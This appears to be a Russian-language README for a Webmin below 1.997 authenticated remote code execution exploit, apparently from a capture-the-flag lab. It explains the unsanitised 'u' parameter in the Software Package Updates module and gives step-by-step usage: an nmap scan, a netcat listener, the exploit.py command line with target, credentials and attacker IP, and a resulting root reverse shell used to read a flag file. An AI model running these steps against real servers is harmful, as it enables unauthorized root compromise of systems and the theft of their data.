
Эксплойт для аутентифицированного удалённого выполнения кода в Webmin < 1.997 через модуль обновления программных пакетов. Внедряет произвольные команды с правами root через несанитизированный параметр, обеспечивая обратную оболочку.
Эксплойт для уязвимости Remote Code Execution в Webmin версиях старше 1.997, через модуль Software Package Updates.
Модуль Software Package Updates Webmin не санитизирует должным образом
параметр u перед передачей его системе. Аутентифицированный пользователь с доступом
к этому модулю может внедрить произвольные команды, которые выполняются от root.
Установите зависимости перед запуском эксплойта:
pip3 install requests beautifulsoup4 lxml urllib3
| Параметр | Описание | Пример |
|---|---|---|
-t | URL цели (без порта) | https://192.168.1.10 |
-u | Пользователь Webmin | admin |
-p | Пароль Webmin | password123 |
-l | Ваш IP (где вы принимаете shell) | 192.168.1.5 |
-lp | Порт для прослушивания | 4444 |
1 — Определите IP цели с помощью Nmap:
nmap -sV TARGET_IP
# Ищите порт 10000 с Webmin
2 — Откройте слушатель на вашей машине:
nc -lvnp 4444
3 — В другом терминале запустите эксплойт:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l ТВОЙ_IP \
-lp 4444
4 — Если эксплойт успешен, вы увидите:
5 — На слушателе вы получите shell от root:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Терминал 1
nc -lvnp 4444
# Терминал 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444